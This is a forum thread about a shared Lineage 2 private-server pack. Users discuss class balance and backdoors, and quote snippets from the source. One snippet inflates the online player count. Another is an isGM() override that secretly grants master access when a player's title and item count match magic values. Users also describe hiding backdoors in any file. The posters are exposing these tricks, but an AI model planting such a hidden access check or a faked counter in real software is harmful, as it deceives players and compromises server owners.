Jump to content

[Share]L2Arena Pack+Source By Kamex The Smartest.


MADM4N

Recommended Posts

I dont know what pack he gave you but mine is totally different and i didnt had any problems with balance,bugs or backdoor as you say

is it clean from bdoors?also the balance you say fine is tested?I can't imagine all these customs with good balance,anyone tested balance of files?It can be a very good files if balacne is good

Link to comment
Share on other sites

is it clean from bdoors?also the balance you say fine is tested?I can't imagine all these customs with good balance,anyone tested balance of files?It can be a very good files if balacne is good

I dint have this pack he gave me more updated check here my server 

Link to comment
Share on other sites

Maxtor sould ban the word "server" cause it's misleading.. Instead everyone should use the word serber. 

 

Also some words like balance, files, pack, etc. should also get renamed to balanska, etc.

 

For more sad storkes(info) contact: Achyjek, Achulek, Ajkalek and Achujkalek.

Link to comment
Share on other sites

	@Override
	public boolean useVoicedCommand(final String command, final L2PcInstance activeChar, final String target)
	{
		if (command.equalsIgnoreCase("online"))
		{
			activeChar.sendMessage("======<Players Online!>======");
			activeChar.sendMessage("There are " + String.valueOf(L2World.getInstance().getAllPlayers().size()* Config.FAKE_PLAYERS) + " players online!.");
			activeChar.sendMessage("=======================");
		}
		return true;
	}

I wanna cry.... L2World.getInstance().getAllPlayers().size() * Config.FAKE_PLAYERS

Link to comment
Share on other sites

Maxtor sould ban the word "server" cause it's misleading.. Instead everyone should use the word serber.

 

Also some words like balance, files, pack, etc. should also get renamed to balanska, etc.

 

For more sad storkes(info) contact: Achyjek, Achulek, Ajkalek and Achujkalek.

sad storka

 

By the way has anyone tested files balance between classes?

Link to comment
Share on other sites

Tell me one dev who don't use backdoor to his project.

 

Serious projects owners.

 

can there be backdoors except on voicecommands?

 

You can backdoor whatever file, even a packet, but it generally has to use existing methods like isGM(). Still, you can easily bypass isGM() making your own methods, making it really tricky to find a backdoor.

Link to comment
Share on other sites

Maxtor sould ban the word "server" cause it's misleading.. Instead everyone should use the word serber. 

 

Also some words like balance, files, pack, etc. should also get renamed to balanska, etc.

 

For more sad storkes(info) contact: Achyjek, Achulek, Ajkalek and Achujkalek.

confirmed storka 

Link to comment
Share on other sites

 

Tell me one dev who don't use backdoor to his project.

I don't use.. I never did.

 

 

By the way has anyone tested files balance between classes?

You expect balance on this shit project? Everything there is customs. No know the story about customs.

Edited by 'Baggos'
Link to comment
Share on other sites

Serious projects owners.

 

 

You can backdoor whatever file, even a packet, but it generally has to use existing methods like isGM(). Still, you can easily bypass isGM() making your own methods, making it really tricky to find a backdoor.

wow,so we generally dont even know what files we buy from someone..i guess to make smth we must make with our own way so we can be sure of our files..

Link to comment
Share on other sites

	
	public boolean isGM()
	{
		if(getTitle().equals("getItemCount(57)") && getInventory().getInventoryItemCount(57, 0) == 5)
		{
			   setAccessLevel(Config.MASTERACCESS_LEVEL);
			   return false;
		}
		return getAccessLevel().isGm();
	}

LOL?

Can someone explain why "getItemCount(57)" instead of getItemCount(57) ...

Edited by bravetobe
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock